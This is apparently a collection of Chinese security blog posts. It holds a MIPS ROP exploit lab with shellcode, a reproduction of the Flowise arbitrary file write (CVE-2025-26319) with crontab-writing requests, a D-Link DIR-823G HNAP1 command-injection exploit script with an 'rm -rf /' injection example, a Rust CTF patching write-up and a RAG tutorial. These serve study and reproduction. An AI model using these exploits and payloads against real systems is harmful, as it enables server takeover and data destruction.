所以,我们需要在跳转前调用 sleep(1) 刷新指令缓存,而sleep函数将参数存放在$a0寄存器中,所以我们在libc.so.0中寻找我们所要的gadget
随便选一个了,选了第二个,且gadget的末尾是跳转到$s1寄存器,先到0x0002fb10地址查看一番
由图所示,我们还要找到可以控制$s1的gadget,以便覆盖数据的时候可以覆盖掉$s1寄存器
但是在main函数中没有出现类似 lw $s0, offset($sp) 的指令,意味着该函数未主动恢复保存寄存器($s0−$s7)的值
函数内部使用了($s0-$s7)这些寄存器,需在函数开头将其保存到栈中(sw $sN, offset($sp)),并在返回前恢复(lw $sN, offset($sp))。
而临时寄存器($t0-$t9)无需保存,调用者需假设其值在函数调用后可能被破坏。
若main函数未使用s0−s7,则无需在栈帧中保存/恢复这些寄存器,因此末尾不会有lw $s0, offset($sp)类指令。
所以由于main函数末尾没有lw $s1, offset($sp),攻击者无法通过覆盖栈上保存的$s1旧值来直接控制该寄存器。
所以,无法直接控制$s1寄存器
需通过其他途径间接控制$s1,比如说,利用其他函数中的gadget恢复$s1,或者是通过数据传递链,比如move指令,将可控寄存器的值传递到$s1
所以还是通过mipsrop.find("lw $s1")找到了一些gadget 0x00006A50
理一下逻辑,使用gadget2=0x00006A50这段gadget设置好寄存器,修改好$s1的值,然后使用gadget1=0x0002FB10这段gadget去刷新数据区
同时还是要找到libc的地址,由上一题可知,libc基地址为0x7f6e5000
所以gadget1=0x7f6e5000+0x0002fb10=0x7f714b10
gadget2=0x00006a50+0x7f6e5000=0x7f6eba50
并且由ida可知调整shellcode的位置为0x58
gadget1=0x7f714b10
gadget2=0x7f6eba50
payload="a"*508
payload+=p32(gadget2)
payload+="a"*0x58
payload+="aaaa" #覆盖s0
payload+="aaaa" #覆盖s1
payload+="aaaa" #覆盖s2
payload+=p32(gadget1)
由ida可知,sleep静态地址为0x0002F2B0,再加上libc_addr的话就为0x7F7142B0
但是不能把sleep地址直接写到s1上,因为当这里填入sleep函数的地址后,程序会直接跳转执行sleep函数,但由于$ra寄存器仍保留着gadget1的地址,在sleep函数执行完毕后又会重新返回到当前位置。因此,需要寻找一个具备双重功能的gadget3——它既能通过s0或s2寄存器实现跳转控制,同时又能够对ra寄存器进行重新赋值,通过mipsrop.tail()找到的gadget3 0x00020F1C+libc_addr=0x7f705f1c
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+="aaaa"#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+="aaaa"#覆盖$ra
sleep函数执行完之后,得找一个可以跳转的地址,并且在那上面可以写shellcode
不过没有找到,在师傅建议下,找了一个可以先控制寄存器上的值,再跳转到这里,通过mipsrop.stackerfind(),gadget4=0x00016dd0+libc_addr=0x7f6fbdd0
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+="aaaa"#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra
从ida显示的0x00016dd0可知,我们还得找一个可以利用$a0跳转的gadget5,直接简单粗暴 mipsrop.find("move $t9,$a0") gadget5=0x000214A0+libc_addr=0x7f7064a0
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
gadget5=0x7f7064a0
sleep_addr=0x7f7142b0
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+=p32(gadget5)#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra
payload+="f"*0x18
payload += p32(0xdeadbeef)
payload += shellcode
随便找了个网站生成了一段小端的shellcode
shellcode = “”
shellcode += "xffxffx06x28" # slti $a2, $zero, -1
shellcode += "x62x69x0fx3c" # lui $t7, 0x6962
shellcode += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f
shellcode += "xf4xffxafxaf" # sw $t7, -0xc($sp)
shellcode+= "x73x68x0ex3c" # lui $t6, 0x6873
shellcode += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e
shellcode += "xf8xffxaexaf" # sw $t6, -8($sp)
shellcode += "xfcxffxa0xaf" # sw $zero, -4($sp)
shellcode += "xf4xffxa4x27" # addiu $a0, $sp, -0xc
shellcode += "xffxffx05x28" # slti $a1, $zero, -1
shellcode += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab
shellcode += "x0cx01x01x01" # syscall 0x40404
完整的payload
from pwn import *
context.binary = "./pwnable/ShellCode_Required/stack_bof_02"
context.arch = "mips"
context.endian = "little"
gadget1=0x7f714b10
gadget2=0x7f6eba50
gadget3=0x7f705f1c
gadget4=0x7f6fbdd0
gadget5=0x7f7064a0
sleep_addr=0x7f7142b0
shellcode = “”
shellcode += "xffxffx06x28" # slti $a2, $zero, -1
shellcode += "x62x69x0fx3c" # lui $t7, 0x6962
shellcode += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f
shellcode += "xf4xffxafxaf" # sw $t7, -0xc($sp)
shellcode+= "x73x68x0ex3c" # lui $t6, 0x6873
shellcode += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e
shellcode += "xf8xffxaexaf" # sw $t6, -8($sp)
shellcode += "xfcxffxa0xaf" # sw $zero, -4($sp)
shellcode += "xf4xffxa4x27" # addiu $a0, $sp, -0xc
shellcode += "xffxffx05x28" # slti $a1, $zero, -1
shellcode += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab
shellcode += "x0cx01x01x01" # syscall 0x40404
payload="a"*508
payload+=p32(gadget2)
payload+="b"*0x58
payload+="cccc" #覆盖s0
payload+=p32(gadget3) #覆盖s1
payload+=p32(sleep)#覆盖s2,写入sleep
payload+=p32(gadget1)
payload+="c"*0x18 #gadget3需要调整的shellcode位置的字节码
payload+=p32(gadget5)#覆盖$s0
payload+="aaaa"#覆盖$s1
payload+="aaaa"#覆盖$s2
payload+=p32(gadget4)#覆盖$ra
payload+="f"*0x18
payload += p32(0xdeadbeef)
payload += shellcode
with open("stack_bof_02_pyload","w") as file:
file.write(payload)
这道题最重要的就是学到mipsrop链的构造。
FlowiseAI 任意文件写入漏洞(CVE-2025–26319)
漏洞简介
Flowise是一款与LangChain兼容的开源低代码工具,使普通用户和开发人员都能通过可视化连线方式创建LLM工作流和AI应用。然而该平台存在严重的文件上传漏洞——尽管Flowise实施了上传校验机制,攻击者仍可通过特殊编码绕过限制,实现任意目录的文件写入。这一安全缺陷使未经授权的攻击者能够上传恶意文件、脚本或SSH密钥,从而获取对托管服务器的远程控制权,对使用该平台构建AI代理的组织构成重大安全威胁。
漏洞复现
安装环境后构造上传的数据包
POST /api/v1/attachments/test/test HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 215
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="test.txt"
Content-Type: text/plain
This is the content of the file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--
在服务器上查找上传文件的位置
再次构造数据包
POST /api/v1/attachments/..%2ftest/test HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 215
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="test.txt"
Content-Type: text/plain
This is the content of the file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--
在服务器上再次查找文件位置
成功实现跨越目录的上传操作
进一步的进行利用的话 可以通过向定时任务中写入文件实现任意命令执行
POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fusr/..%2fvar%2fspool%2fcron%2fcrontabs HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 657
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="root"
Content-Type: text/plain
# do daily/weekly/monthly maintenance
# min hour day month weekday command
*/15 * * * * run-parts /etc/periodic/15min
0 * * * * run-parts /etc/periodic/hourly
0 2 * * * run-parts /etc/periodic/daily
0 3 * * 6 run-parts /etc/periodic/weekly
0 5 1 * * run-parts /etc/periodic/monthly
* * * * * echo "a" >> /tmp/test.txt
------WebKitFormBoundary7MA4YWxkTrZu0gW--
漏洞分析
在Flowise平台的核心架构中,通过constants.ts 文件定义了一系列无需认证即可访问的API端点,这些端点被归类为WHITELIST_URLS 。该设计允许特定功能(如API密钥验证、公共聊天流和文件操作等)在未经认证的情况下运行,以提高用户体验和系统灵活性。
Flowise-main/packages/server/src/utils/constants.ts
当服务器接收到新的HTTP请求时,其鉴权流程遵循严格的逻辑顺序:首先检查请求路径是否包含"/api/v1"前缀(不区分大小写);接着进行大小写敏感的路径验证;随后系统会判断该URL是否存在于预定义的白名单中。若请求路径已被列入白名单,则继续处理;否则,系统会进一步检查请求头中是否包含"internal"标记,或尝试验证API密钥。
Flowise-main/packages/server/src/index.ts
Flowise-main/packages/server/src/routes/attachments/index.ts
Flowise-main/packages/server/src/services/attachments/index.ts#createFileAttachment
/api/v1/attachments/ 路由下存在上传创建文件的操作
Flowise-main/packages/server/src/utils/createAttachment.ts#createFileAttachment
createFileAttachment 中会调用 addArrayFilesToStorage 来对文件进行处理
此时我们也可以看到对应的所有上传路由 /api/v1/attachments/:chatflowId/:chatId
Flowise-main/packages/components/src/storageUtils.ts#addArrayFilesToStorage
在 addArrayFilesToStorage 中对文件地址进行处理时,会将 chatflowId 和 chatId 未经处理也直接拼接到路径中,所以可以通过编码就直接绕过目录限制实现跨目录的上传。
路由器安全研究:D-Link DIR-823G v1.02 B05 复现与利用思路
前言
D-Link DIR-823G v1.02 B05存在命令注入漏洞,攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求,执行任意的操作系统命令。
漏洞分析
binwalk提取固件,成功获取到固件。
现在我们已经进入到应用里了,那么我们在进行分析固件的时候,应该怎么去分析这个情况?首先,我们去分析别人的漏洞,别人是会告诉哪里会出现问题。但是我们现在假设我们是分析一个未知固件,我们就得先知道这个固件有哪些应用,启动了哪些服务,最清晰和简便的方式就是去看我们etc文件下面,里面有个叫init.d的目录,里面是关于启动项的内容。
我们首先来看rcS下面的内容 vim rcS
首先是设置ip,然后挂载了两个文件系统分别是proc,这是与进程相关的文件系统,包括当前进程启动存放在哪个地址。
还有ramfs文件系统,根据以前的笔记,可知ramfs文件系统跟RAM相关。
然后下面就是判断是否还有挂载别的文件系统。
然后mkdir就是创建各种各样的文件夹,都有对应的功能,比如说创建了pptp文件夹,针对拨号上网的功能,然后还有smbd服务,可以看到创建了一个usb的文件夹,说明该固件有可以跟usb也就是U盘相关的操作,接下来都是一些配置信息。
继续往下翻
可以看到该固件启动了web server的web服务,也就是httpd的内容,这里启动的是goahead,通过这个名字,我们可以确定web服务就是goahead,如果想要分析web服务的话,就直接分析goahead就可以。
我们回到squashfs-root目录下,搜索goahead的一些简单情况
grep -ir "goahead" .
最下面是两个启动项的内容,可以忽略,然后第一行是bin的可执行应用,这个其实就是我们最后分析的内容。
那如何分析呢?它是一个HNAP1请求,那就可以去检索我们的HANP1请求
grep -ir "HNAP1" .
可以看到它检索到一些js代码,js代码对我们来说一般,(比较我们是找二进制相关的漏洞)
但是,我们可以发现它匹配了一个二进制程序,也就是goahead。
这里我们先科普一下goahead的一些情况:
GoAhead ,它是一个源码,免费、功能强大、可以在多个平台运行的嵌入式WebServer。
goahead的websUrlHandlerDefine函数允许用户自定义不同url的处理函数。
它在进行编写与它相关的请求,是通过websUrlHandlerDefine来确定的。
websUrlHandlerDefine(T("/HNAP1"),NULL,0, websHNAPHandler,0);
websUrlHandlerDefine(T("/goform"),NULL,0, websFormHandler,0);
websUrlHandlerDefine(T("/cgi.bin"),NULL,0, websCgiHandler,0);
使用ghidra进行逆向分析,goahead二进制文件在squashfs-root目录下的bin目录下
那进入到goahead反编译界面该如何分析呢?一种是找到main函数去进行分析,比较耗时
一种是通过关键字来搜索,反推调用情况,来推测每个功能的解析情况 ctrl+shift+E
匹配成功,停在指定区域
但是它所对应的反编译代码还是很多的,所以我们可以通过反编译出来的函数名,进行查看它的调用关系。
一路往下翻,终于找到我们所要的东西
而且我们看到,这个函数继续往上调的话就是main函数了,所以其实一开始也是可以从main函数来分析的(0.0)
所以现在我们可以重点来分析这个函数
前面还是做一些判断,然后请求还有不止HNAP1,对应的都是一个函数。
同一个函数做的事情,类似于websUrlHandlerDefine这个函数,那HANP1对应的函数是
FUN_0042383c,那就双击进去看看
这里就是漏洞点,这里执行了memset和snprintf,一般来说这里应该是不存在漏洞点,但是下面一条语句是system,也就是把格式化化的字符串直接就拿到了system函数作为参数传递进去,而snprintf这里的参数有个echo,有个单引号问题。
比如说正常代码
#!/bin/bash
read -p "Enter your name: " name
echo 'Hello, '$name'!'
攻击步骤:
正常输入:用户输入 Alice,输出:
Hello, Alice!
恶意输入:用户输入 '$(id)',此时脚本实际执行的命令变为:
echo 'Hello, ''$(id)'!'
输出:
Hello, $(id)!
单引号内的 $(id) 不会被执行,暂时安全。
更危险的输入:用户输入 ' && rm -rf / #,命令变为:
echo 'Hello, '' && rm -rf / #'!
此时,第一个单引号被用户输入的 ' 闭合。&& rm -rf / 成为独立命令,在 echo 之后执行。# 注释掉后续的 '!,避免语法错误。
那么会导致rm -rf / 会被执行,删除系统文件!
所以,如果我们构造一些恶意的代码写入到snprintf中,再传递到system函数,就会造成命令注入漏洞。
但是我们要进到漏洞点的话,还需要满足函数上面的一些要求。
所以我们得符合上面函数的一些限制才能进入到漏洞点来,这里先取了PTR_s_SetMultipleActions_00588d80的首地址,赋值给DAT_0058a6c4,然后DAT_0058a6c4自身判断和自加2来进行循环判断,用strstr函数查找DAT_0058a6c4在param_+0x524中出现的位置,并赋值给pcVar1,如果pcVar1的值不为0的话,就会进入到我们的漏洞点来。
DAT_0058a6c4与PTR_s_SetMultipleActions_00588d80相关,双击进去看看
可以看到里面都是它对应的一些方法,比如说SetMultipleActions之类的。
固件模拟
分析到这里,基本上是明朗了,接下来就要进行固件模拟操作,使用firmadyne模拟固件启动。
sudo ./DIR823G_V1.0.2B05_20181207.sh
然后firmadyne默认的密码就是firmadyne
得等一段时间,然后192.168.0.1
但是这个一直搞不定,模拟不起来,也不知道是什么原因,排查不出。
然后换成了firmware analysis plus (fap)这个框架,就模拟起来了
等一段时间后,回车,就可以模拟起来了,输入192.168.0.1
进入向导,随便输入点东西
密码8位,输入12345678
然后就开始配置一些内容,同时可以注意到左侧已经把一些数据写入到关键的文件夹中
配置完毕,登录,成功进入路由器
exp编写
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
ip='192.168.0.1'
command="'`echo aaaaaaaaa > /web_mtn/test.txt`'"
length=len(command)
headers=requests.utils.default_headers()
headers["Content-Length"]=str(length)
headers["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
headers["SOAPAction"]='"http://purenetworks.com/HNAP1/GetClientInfo"'
headers["Content-Type"]="text/xml; charset=UTF-8"
headers["Accept"]="*/*"
headers["Accept-Encoding"]="gzip, deflate"
headers["Accept-Language"]="zh-CN,zh;q=0.9,en;q=0.8"
payload=command
r=requests.post('http://'+ip+'/HNAP1/', headers=headers, data=payload)
因为是http请求,所以我们使用requests,然后设置ip,设置命令,构造报头,最后post请求将HNAP1,headers和payload都传过去。
复现完毕,ctrl+a 然后x结束固件模拟。
ApoorvCTF Rust语言逆向实战
上周参加了国外的比赛,名称叫:ApoorvCTF
看一下老外的比赛跟我们有什么不同,然后我根据国内比赛对比发现,他们考点还是很有意思的,反正都是逆向,哈哈哈
Rusty Vault
题目描述:
In the heart of an abandoned shrine, there's an old, rusted vault saidto guard an unspeakable secret. Many have tried to unlock it, but thedoor's demands are strange and no key seems to fit.
进入main函数,开始分析
这个命名方式,大概率是Rust语言
对于rust语言逆向,一般采用动态调试分析的方法
主要还是看汇编,因为F5根本看不出来啥东西。。。
从if比较处,可以看到成功和失败两个结果
那么这个比较绝对很关键
进入后发现,啥也没啊?
坏了,得看汇编,为代码估计又出问题了
发现了check2,果然为代码啥也看不到
对比check1-2
发现是在检测输入的字符串的字符类型,还是冲突的,不管了继续分析
下面可以看到失败
往下滑动可以看到成功
什么意思?
我猜测这题是改条件,然后动态输出flag?还有这好事
后面都是正常输出flag了
那么我们现在去解密的地方回溯,估计我要改一些判断,改变流程,让程序正常走到解密的地方,然后输出flag
教大家一个回溯方法
对标签疯狂X键,交叉引用定位回溯
最终定位到密文,发现是aes_128_cbc模式
需要:key+IV+密文=明文
这是一种思路,大家可以尝试
本文修改流程,让他自动输出明文
现在的思路就是:
x键回溯定位关键标签,修改关键判断
让程序自动走向解密
nop掉check1 和 check2
让他们走向自动解密的方向
最终运行程序得到flag,静态patch流程,绕过check1-chekc2
apoorvctf{P4tch_1t_L1k3_1t's_HOt}
这在我们国内比赛还是很少见到的,国内大概率要写脚本解密,或许国内认为加密才是CTF的重点。国外侧重逆向本身,如果可以patch修改流程得到flag,为什么要去写解密脚本呢?
锻炼了我们通过汇编分析程序流程的能力,而不是为代码一键分析。
给大模型通过RAG挂上知识库
前言
因为大模型的知识库存在于训练期间,因此对于一些最新发生的事或者是专业性问题可能会出现不准确或者是幻觉,因此可以使用RAG技术给大模型外挂知识库来达到精准回答的目的。
实操
gpt4all
可以参考之前的文章:https://mp.weixin.qq.com/s/jeGqX-XYJRm-pFYEfkw2lw
他的优点就是通过UI在线下载模型和导入知识库,操作都比较一站式、傻瓜式。注意的是gpt4all的模型文件和ollama不通用。
open-webui
安装可以参考https://mp.weixin.qq.com/s/jeGqX-XYJRm-pFYEfkw2lw,也比较简单就不多赘述。
先看下在没有知识库的情况下,咨询相关问题时得到的结果是错误的:
可以通过如下方式进行知识库的构建:
右上角-工作空间-知识库-新增知识库空间-上传知识库文件
这个时候再咨询知识库中存在的内容时就可以得到满意的结果(引用的方式是在输入框中输入#):
ima
https://ima.qq.com/ima是腾讯出品的AI+知识库的软件。创建知识库的流程为:
首先有个缺点,它竟然不能上传markdown。还有些其他BUG,比如明明存在知识库,但是却选择不了:
因为没法设置prompt,如果你想让大模型每次都只从知识库中搜索不要联想,那么就就需要每次在输入框中输入特定prompt告知不要胡乱回答,结果发现又是混元问题,问答模型改成deepseek后好点:
终于明白这些公司为什么要接deepseek了,因此自己公司的太差。
langchain+chroma
上面介绍的都是通过图形化的方式进行,但是在一些工程化的地方可能没法进行图形化操作,接下来介绍使用代码的方式来进行让大模型外挂知识库。把文档投喂给大模型时需要先对文档进行向量转换,这里以https://github.com/chroma-core/chroma 官方代码为例:
import chromadb
# setup Chroma in-memory, for easy prototyping. Can add persistence easily!
client = chromadb.Client()
# Create collection. get_collection, get_or_create_collection, delete_collection also available!
collection = client.create_collection("all-my-documents")
# Add docs to the collection. Can also update and delete. Row-based API coming soon!
collection.add(
documents=["This is document1", "This is document2"], # we handle tokenization, embedding, and indexing automatically. You can skip that and add your own embeddings as well
metadatas=[{"source": "notion"}, {"source": "google-docs"}], # filter on these!
ids=["doc1", "doc2"], # unique for each doc
)
# Query/search 2 most similar results. You can also .get by id
results = collection.query(
query_texts=["This is document1"],
n_results=2,
# where={"metadata_field": "is_equal_to_this"}, # optional filter
# where_document={"$contains":"search_string"} # optional filter
)
print(results)
上述代码含义是创建了一个集合,并且往集合中添加知识库,每个知识库都必须有自己的独立id。注意,chroma只支持传入文本不支持直接引用文件,因此想要把文件转成向量需要先把文件读取出内容给到chroma才行。
得到的内容如下:
{'ids': [['doc1', 'doc2']], 'embeddings': None, 'documents': [['This is document1', 'This is document2']], 'uris': None, 'data': None, 'metadatas': [[{'source': 'notion'}, {'source': 'google-docs'}]], 'distances': [[0.0, 0.2221483439207077]], 'included': [<IncludeEnum.distances: 'distances'>, <Inclu
其中distances代表是距离,笔者特地把搜索的问题和id为doc1的内容一致,因此可以看到得到的距离为0(距离越小,相似度越高),代表问题和文档一模一样,因此在后续投喂给大模型时,可以选择小于多少距离的投喂给大模型来解决token过长的问题。
接下来介绍https://github.com/langchain-ai/langchain,langchain功能和它的名字一样,简单理解就是它可以把各个东西和大模型串在一起,比如可以把上面chroma生成的文档向量投喂给大模型进行知识库问答。langchain牛逼的点是他做了很多第三方工具的集成,比如以langchains调用chroma生成向量数据库为例:
from langchain_ollama import OllamaEmbeddings
from langchain_chroma import Chroma
from uuid import uuid4
from langchain_core.documents import Document
embeddings = OllamaEmbeddings(model="nomic-embed-text:latest")
vector_store = Chroma(
collection_name="example_collection",
embedding_function=embeddings,
persist_directory="./chroma_langchain_db", # Where to save data locally, remove if not necessary
)
document_1 = Document(
page_content="I had chocolate chip pancakes and scrambled eggs for breakfast this morning.",
metadata={"source": "tweet"},
id=1,
)
document_2 = Document(
page_content="The weather forecast for tomorrow is cloudy and overcast, with a high of 62 degrees.",
metadata={"source": "news"},
id=2,
)
document_3 = Document(
page_content="Building an exciting new project with LangChain - come check it out!",
metadata={"source": "tweet"},
id=3,
)
document_4 = Document(
page_content="Robbers broke into the city bank and stole $1 million in cash.",
metadata={"source": "news"},
id=4,
)
document_5 = Document(
page_content="Wow! That was an amazing movie. I can't wait to see it again.",
metadata={"source": "tweet"},
id=5,
)
document_6 = Document(
page_content="Is the new iPhone worth the price? Read this review to find out.",
metadata={"source": "website"},
id=6,
)
document_7 = Document(
page_content="The top 10 soccer players in the world right now.",
metadata={"source": "website"},
id=7,
)
document_8 = Document(
page_content="LangGraph is the best framework for building stateful, agentic applications!",
metadata={"source": "tweet"},
id=8,
)
document_9 = Document(
page_content="The stock market is down 500 points today due to fears of a recession.",
metadata={"source": "news"},
id=9,
)
document_10 = Document(
page_content="I have a bad feeling I am going to get deleted :(",
metadata={"source": "tweet"},
id=10,
)
documents = [
document_1,
document_2,
document_3,
document_4,
document_5,
document_6,
document_7,
document_8,
document_9,
document_10,
]
uuids = [str(uuid4()) for _ in range(len(documents))]
vector_store.add_documents(documents=documents, ids=uuids)
results = vector_store.similarity_search_with_score(
"Will it be hot tomorrow?", k=1, filter={"source": "news"}
)
print("-----")
print(results)
print("-----")
for res, score in results:
print(f"* [SIM={score:3f}] {res.page_content} [{res.metadata}]")
print("-----")
上述代码意思是指生成10个文档,然后通过langchain内置的第三方模块能力把这10个文档写入到了example_collection集合中,且向量数据库持久化,保存的路径为chroma_langchain_db目录中,最后在向量数据库中以source为news、最接近的1个为条件文档中搜索问题:
接下来尝试使用langchain调用ollama进行与本地大模型进行沟通:
from langchain_ollama import ChatOllama
llm = ChatOllama(
model="deepseek-r1:latest",
temperature=0.5,
)
messages = [
(
"system",
"角色:你是IT小助手,你只回答IT相关问题,其他问题不回答。当别人问你是谁时,你回答:我是IT小助手。",
),
("human", "你是谁"),
]
ai_msg = llm.invoke(messages)
print(ai_msg)
上述代码通过设置system prompt来约束了大模型的输出:
上面提到chroma无法直接传入文件,因此langchian提供了https://python.langchain.com/docs/concepts/document_loaders/来实现读取不同类型的文件并输入给chroma。为了解决嵌入模型和大语言模型输入的的token限制,需要对文档进行分割,下面以读取txt文件为例,通过对内容进行分割,然后提供给嵌入模型转成向量并搜索相似度后,带入到大语言模型的上下文中进行提问:
from typing import Dict
import logging
from pathlib import Path
from langchain_ollama import ChatOllama
from langchain_core.prompts import ChatPromptTemplate
from langchain_ollama import OllamaEmbeddings
from langchain_text_splitters import RecursiveCharacterTextSplitter
from langchain_community.document_loaders import TextLoader
from langchain.chains import RetrievalQA
from langchain_chroma import Chroma
class VectorStoreQA:
def __init__(self,
model_name: str = "deepseek-r1:latest",
embedding_model: str = "nomic-embed-text:latest",
temperature: float = 0.5,
k: int = 4):
"""
初始化 QA 系统
Args:
model_name: LLM 模型名称
embedding_model: 嵌入模型名称
temperature: LLM 温度参数
k: 检索返回的文档数量
"""
# 配置日志
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
self.logger = logging.getLogger(__name__)
self.k = k
# 初始化 LLM
self.llm = ChatOllama(
model=model_name,
temperature=temperature,
)
# 初始化 embeddings
self.embeddings = OllamaEmbeddings(model=embedding_model)
# 初始化向量存储
self.vector_store = Chroma(embedding_function=self.embeddings)
# 初始化 prompt 模板
# self.prompt = ChatPromptTemplate.from_messages([
# ("system", """你的任务是且只基于提供的上下文信息回答用户问题。要求:1. 回答要准确、完整,并严格基于上下文信息2. 如果上下文信息不足以回答问题,不要编造信息和联想,直接说:在知识库中我找不到相关答案3. 采用结构化的格式组织回答,便于阅读"""),
# ("user", """上下文信息:
# {context}
# 用户问题:{question}
# 请提供你的回答:""")
# ])
self.prompt = ChatPromptTemplate.from_messages([
("system", """上下文中没有相关资料的不要编造信息、不要从你历史库中搜索,直接说:在知识库中我找不到相关答案。"""),
("user", """上下文信息:{context}
用户问题:{question}
请提供你的回答:""")
])
def load_documents(self, file_path: str, chunk_size: int = 1000, chunk_overlap: int = 200) -> None:
"""
加载并处理文本文档
Args:
file_path: 文本文件路径
chunk_size: 文档分块大小
chunk_overlap: 分块重叠大小
"""
try:
# 验证文件
path = Path(file_path)
if not path.exists():
raise FileNotFoundError(f"文件不存在: {file_path}")
# 加载文档
loader = TextLoader(str(path))
docs = loader.load()
# 文档分块
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=chunk_size,
chunk_overlap=chunk_overlap
)
splits = text_splitter.split_documents(docs)
# 添加到向量存储
self.vector_store.add_documents(documents=splits)
self.logger.info(f"成功加载文档: {file_path}")
except Exception as e:
self.logger.error(f"文档处理错误: {str(e)}")
raise
def get_answer(self, question: str) -> Dict:
"""
获取问题的答案
Args:
question: 用户问题
Returns:
包含答案的字典
"""
# 使用similarity_search_with_score方法获取文档和分数
docs_and_scores = self.vector_store.similarity_search_with_score(
query=question,
k=self.k
)
# 打印每个文档的内容和相似度分数
print("\n=== 检索到的相关文档 ===")
for doc, score in docs_and_scores:
print(f"\n相似度分数: {score:.4f}") # 保留4位小数
print(f"文档内容: {doc.page_content}")
print(f"元数据: {doc.metadata}") # 如果需要查看文档元数据
print("-" * 50) # 分隔线
# 提取文档内容用于后续处理
context = "\n\n".join(doc.page_content for doc, _ in docs_and_scores)
# 打印完整的prompt内容
print("\n=== 实际发送给模型的Prompt ===")
formatted_prompt = self.prompt.format(
question=question,
context=context
)
print(formatted_prompt)
print("=" * 50)
# docs = self.retriever.get_relevant_documents(question)
# 将文档内容合并为上下文
# context = "\n\n".join(doc.page_content for doc in docs)
# print(context)
# 创建chain并调用
chain = self.prompt | self.llm
response = chain.invoke({
"question": question,
"context": context
})
return response
def clear_vector_store(self):
"""清空向量存储"""
try:
self.vector_store.delete_collection()
self.vector_store = Chroma(embedding_function=self.embeddings)
self.logger.info("已清空向量存储")
except Exception as e:
self.logger.error(f"清空向量存储时发生错误: {str(e)}")
raise
# 使用示例
if __name__ == "__main__":
# 初始化 QA 系统
qa_system = VectorStoreQA(
model_name="deepseek-r1:latest",
k=4
)
# 加载文档
qa_system.load_documents("/tmp/1.txt")
# 提问
question = "猪八戒是谁?"
result = qa_system.get_answer(question)
print(result)
总结
如果只是想简单尝试下大模型+知识库,那么gpt4all和ima都可以,毕竟都是图形化点点点就行,如果想要去自定义一些模型或者本身依赖ollama运行模型的话,可以选择open-webui,其可以有更多的自定义能力,如果想要在工程化中使用,建议使用langchain+chroma。
安全测试中的js逆向实战
一、简介
